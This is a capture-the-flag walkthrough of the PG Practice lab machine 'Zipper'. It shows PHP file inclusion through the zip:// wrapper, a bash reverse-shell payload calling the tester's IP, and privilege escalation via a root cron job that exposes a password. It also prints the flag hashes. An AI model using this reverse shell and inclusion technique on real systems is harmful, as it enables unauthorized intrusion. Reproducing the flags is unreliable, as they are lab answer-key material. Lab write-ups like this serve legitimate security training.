Summary #
On port 80 there is a website called Zipper. The applications allows for uploading files to zip format and be able to download them. Using a ZIP PHP wrapper we can create a PHP reverse shell and run it using this ZIP PHP wrapper. Once we got initial access there is a script running as the root user every minute called: /opt/backup.sh. The password is given with the command as a parameter, which allows to escalate our privileges to the root user.
Specifications #
- Name: ZIPPER
- Platform: PG PRACTICE
- Points: 25
- Difficulty: Hard
- OS: Linux zipper 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.153.229
- OFFSEC provided credentials: None
- HASH:
local.txt:d08b27a1045d6ba4f3e244f453298553 - HASH:
proof.txt:76526fbd8d67368a4ff0cc22faec56bf
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir zipper && cd zipper && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Aug 17 16:53 .
drwxrwxr-x 32 kali kali 4096 Aug 17 16:53 ..
drwxrwxr-x 2 kali kali 4096 Aug 17 16:53 enum
drwxrwxr-x 2 kali kali 4096 Aug 17 16:53 exploits
drwxrwxr-x 2 kali kali 4096 Aug 17 16:53 files
drwxrwxr-x 2 kali kali 4096 Aug 17 16:53 tools
drwxrwxr-x 2 kali kali 4096 Aug 17 16:53 uploads
## set bash variable
ip=192.168.153.229
## ping target to check if it's online
ping $ip
PING 192.168.153.229 (192.168.153.229) 56(84) bytes of data.
64 bytes from 192.168.153.229: icmp_seq=1 ttl=61 time=18.5 ms
64 bytes from 192.168.153.229: icmp_seq=2 ttl=61 time=23.3 ms
^C
--- 192.168.153.229 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 18.494/20.913/23.332/2.419 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.153.229:22
Open 192.168.153.229:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 16:54 CEST
Initiating Ping Scan at 16:54
Scanning 192.168.153.229 [4 ports]
Completed Ping Scan at 16:54, 0.85s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:54
Completed Parallel DNS resolution of 1 host. at 16:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:54
Scanning 192.168.153.229 [2 ports]
Discovered open port 22/tcp on 192.168.153.229
Discovered open port 80/tcp on 192.168.153.229
Completed SYN Stealth Scan at 16:54, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.153.229
Host is up, received echo-reply ttl 61 (0.63s latency).
Scanned at 2025-08-17 16:54:23 CEST for 1s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
Raw packets sent: 6 (240B) | Rcvd: 36 (1.436KB)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH6PH1/ST7TUJ4Mp/l4c7G+TM07YbX7YIsnHzq1TRpvtiBh8MQuFkL1SWW9+za+h6ZraqoZ0ewwkH+0la436t9Q+2H/Nh4CntJOrRbpLJKg4hChjgCHd5KiLCOKHhXPs/FA3mm0Zkzw1tVJLPR6RTbIkkbQiV2Zk3u8oamV5srWIJeYUY5O2XXmTnKENfrPXeHup1+3wBOkTO4Mu17wBSw6yvXyj+lleKjQ6Hnje7KozW5q4U6ijd3LmvHE34UHq/qUbCUbiwY06N2Mj0NQiZqWW8z48eTzGsuh6u1SfGIDnCCq3sWm37Y5LIUvqAFyIEJZVsC/UyrJDPBE+YIODNbN2QLD9JeBr8P4n1rkMaXbsHGywFtutdSrBZwYuRuB2W0GjIEWD/J7lxKIJ9UxRq0UxWWkZ8s3SNqUq2enfPwQt399nigtUerccskdyUD0oRKqVnhZCjEYfX3qOnlAqejr3Lpm8nA31pp6lrKNAmQEjdSO8Jxk04OR2JBxcfVNfs=
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
| 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
On port 80 there is a website called Zipper. When you click on Browse we can select a file to be zipped and uploaded. After selecting a file called test.txt we click Upload and see what happens.
There appears a link (http://192.168.153.229/uploads/upload_1755446593.zip) to a zipfile in the uploads directory. Once we click this link we can download the zipfile and can see that our file test.txt is in the zipfile.
When we click on Home the URL looks like this: http://192.168.153.229/index.php?file=home. When we change this URL to see if the application is vulnerable for path traversal, like so: http://192.168.153.229/index.php?file=../../../../../../../../etc/passwd nothing show up.
Let’s try is we can use a PHP wrapper () which can allow for Local File Inclusion / Remote Code Execution (RCE). Let’s change the URL to: http://192.168.153.229/index.php?file=php://filter/convert.base64-encode/resource=index, and see if we get a base64 encoded string of the index.php file. Indeed, we get a string back
## decode the base64 encoded string
echo -n 'PD9waHAKJGZpbGUgPSAkX0dFVFsnZmlsZSddOwppZihpc3NldCgkZmlsZSkpCnsKICAgIGluY2x1ZGUoIiRmaWxlIi4iLnBocCIpOwp9CmVsc2UKewppbmNsdWRlKCJob21lLnBocCIpOwp9Cj8+Cg==' | base64 -d
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file".".php");
}
else
{
include("home.php");
}
?>
So the PHP wrapper works. Now, there are many PHP wrapper available (https://www.php.net/manual/en/wrappers.php), within the compression streams there’s also the ZIP wrapper (https://www.php.net/manual/en/wrappers.compression.php). The usage is: zip://archive.zip#dir/file.txt, so let’s create a zip file with a PHP reverse shell and instead of calling file.txt let’s call our reverse shell PHP file.
## get local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.204/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::789b:44fc:8aea:a793/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## setup a listener
nc -lvnp 9001
listening on [any] 9001 ...
## change directory
cd files
## create `revshell.php` with this content:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.204/9001 0>&1'");?>
Now upload the revshell.php file and copy the filename in the download URL: http://192.168.153.229/uploads/upload_1755449033.zip, in our case upload_1755449033.zip. Create the URL with PHP ZIP wrapper and the zip filename and the file we want to execute, namely, revshell: http://192.168.153.229/index.php?file=zip://uploads/upload_1755449033.zip%23revshell. Once entered in the browser we get initial access on our listener as the www-data user in the /var/www/html directory.
## catch the reverse shell
nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.153.229] 47758
bash: cannot set terminal process group (963): Inappropriate ioctl for device
bash: no job control in this shell
www-data@zipper:/var/www/html$
## find `local.txt` on the filesystem
www-data@zipper:/var/www/html$ find / -iname 'local.txt' 2>/dev/null
/var/www/local.txt
## print `local.txt`
www-data@zipper:/var/www/html$ cat /var/www/local.txt
d08b27a1045d6ba4f3e244f453298553
Privilege Escalation #
To get a proper TTY we upgrade our shell using the script binary.
## determine location script binary
which script
/usr/bin/script
## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null
## after this command press the `enter` key twice
stty raw -echo ; fg ; reset
## run the following to be able to clear the screen and set the terrminal correct
www-data@zipper:/var/www/html$ export TERM=xterm
www-data@zipper:/var/www/html$ stty columns 200 rows 200
download and upload pspy to the target and run it to see if there are processes running that we can abuse. Go to: https://github.com/DominicBreuker/pspy, click on releases and select pspy64. Move the file to the uploads directory, startup a local webserver and on the target, download pspy64 and run it. There is a script running as root (UID=0) every minute called /opt/backup.sh. This command also shows the password, but like this: **********. Set the interval to 10 milliseconds to see the password used: WildCardsGoingWild otherwise you would see a password When we use this password in switching to the root user, we indeed get logged in as the root user.
## change directory
cd uploads
## move the file from the local downloads directory to the uploads directory
mv ~/Downloads/pspy64 .
## get the local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.204/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::789b:44fc:8aea:a793/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start a local webserver
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
## on the target
## change directory
www-data@zipper:/var/www/html$ cd /var/tmp
www-data@zipper:/var/tmp$
## download pspy64 using wget
www-data@zipper:/var/tmp$ wget http://192.168.45.204/pspy64
--2025-08-17 17:09:54-- http://192.168.45.204/pspy64
Connecting to 192.168.45.204:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64.1'
pspy64.1 0%[ pspy64.1 40%[===========================================> pspy64.1 100%[=============================================================================================================>] 2.96M 7.45MB/s in 0.4s
2025-08-17 17:09:55 (7.45 MB/s) - 'pspy64.1' saved [3104768/3104768]
## set execution bit
www-data@zipper:/var/tmp$ chmod +x pspy64
## run `pspy64` with an interval op 10 milliseconds
www-data@zipper:/var/tmp$ ./pspy64 -i 10
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 10ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
<SNIP>
2025/08/17 16:58:01 CMD: UID=0 PID=5881 | bash /opt/backup.sh
2025/08/17 16:58:01 CMD: UID=0 PID=5880 | /bin/sh -c bash /opt/backup.sh
2025/08/17 16:58:01 CMD: UID=0 PID=5879 | /usr/sbin/CRON -f
2025/08/17 16:58:01 CMD: UID=0 PID=5884 | /usr/lib/p7zip/7za a /opt/backups/backup.zip -pWildCardsGoingWild -tzip @enox.zip enox.zip upload_1628773085.zip upload_1755445413.zip upload_1755446593.zip upload_1755446805.zip upload_1755447348.zip upload_1755447613.zip upload_1755449033.zip
## switch user to `root`, enter password: `WildCardsGoingWild`
www-data@zipper:/var/tmp$ su -
Password:
root@zipper:~#
## print `proof.txt`
root@zipper:~# cat /root/proof.txt
76526fbd8d67368a4ff0cc22faec56bf
References #
[+] https://www.php.net/manual/en/wrappers.php [+] https://www.php.net/manual/en/wrappers.compression.php